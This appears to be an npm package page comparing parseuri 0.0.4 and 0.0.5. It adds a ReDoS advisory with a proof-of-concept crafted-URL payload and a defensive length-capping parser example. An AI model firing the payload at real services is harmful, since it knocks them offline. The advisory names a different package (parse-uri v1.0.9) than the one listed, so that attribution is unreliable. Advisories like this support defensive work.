Parseuri is a lightweight npm package that splits a URI into its constituent parts and returns them in a structured form, so that developers can inspect or manipulate individual components. Version 0.0.5, released in October 2016, builds on version 0.0.4, released in July 2014. Both versions share the same core functionality: parsing a URI and returning an array representing its components. Both depend on the "better-assert" package, and both specify the same version range, "~1.0.0". Both use Mocha for testing and are released under the MIT license, which gives developers broad freedom in using the library.
The primary distinction lies in the declared devDependencies. Version 0.0.5 explicitly lists better-assert as a devDependency at version 1.0.0, while version 0.0.4 does not. Listing better-assert directly in the devDependencies of version 0.0.5 may indicate a tighter integration of assertions into the test setup during development. The repository URL also differs slightly: version 0.0.5 uses git+https:// while version 0.0.4 uses https://. Ultimately, both versions offer simple URI parsing. Version 0.0.5 may be preferable for developers who want the more recent release, but reviewing the actual code changes between the two versions is recommended before relying on either.
All vulnerabilities related to version 0.0.5 of the package
parse-uri Regular expression Denial of Service (ReDoS)
An issue in parse-uri v1.0.9 allows attackers to cause a Regular expression Denial of Service (ReDoS) via a crafted URL.
const parseuri = require("parse-uri");

// Proof-of-concept from the advisory: the long run of "a" characters is meant to
// trigger excessive backtracking in the package's URI regex.
async function exploit() {
  const craftedInput = 'http://example.com/' + 'a'.repeat(30000) + '?key=value';
  const result = await parseuri(craftedInput);
  return result;
}

// Invoke without top-level await so the snippet also runs as a CommonJS script.
exploit().catch(console.error);
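As a defensive counterpart to the advisory above, the following is an added example (not code from the parse-uri project or from the advisory) of how an application can neutralise this class of ReDoS before a regex-based parser ever sees the input: it caps the accepted URI length and then parses with Node's built-in WHATWG URL parser, which is not regex-driven. The limit MAX_URI_LENGTH, the function name parseUriSafely and the sample inputs are assumptions for this example.

```javascript
// Added example: bound input size, then parse with Node's WHATWG URL parser
// instead of a backtracking regular expression. Not code from parse-uri.
const MAX_URI_LENGTH = 2048; // assumed policy limit; tune per application

// Returns { ok: true, ...components } or { ok: false, reason }.
function parseUriSafely(input, maxLength = MAX_URI_LENGTH) {
  if (typeof input !== "string") {
    return { ok: false, reason: "not-a-string" };
  }
  // Length check first: this is the cheap guard that stops a 30,000-character
  // crafted path from reaching any parser, regex-based or otherwise.
  if (input.length > maxLength) {
    return { ok: false, reason: "too-long", length: input.length };
  }
  let url;
  try {
    url = new URL(input); // WHATWG parser: no catastrophic backtracking
  } catch (e) {
    return { ok: false, reason: "invalid-url" };
  }
  return {
    ok: true,
    protocol: url.protocol.replace(/:$/, ""),
    host: url.hostname,
    port: url.port,
    path: url.pathname,
    query: url.search.replace(/^\?/, ""),
    hash: url.hash.replace(/^#/, ""),
    params: Object.fromEntries(url.searchParams),
  };
}

// Constructed sample inputs: the advisory's shape of crafted URL, and a normal one.
const crafted = "http://example.com/" + "a".repeat(30000) + "?key=value";
const normal = "https://user@example.org:8443/a/b?key=value&x=1#frag";

module.exports = { parseUriSafely, MAX_URI_LENGTH, crafted, normal };
```

With the default limit the crafted input is rejected as "too-long" without any parsing work; raising the limit shows that the WHATWG parser handles the same input in linear time, so the cap is a policy choice rather than a correctness requirement.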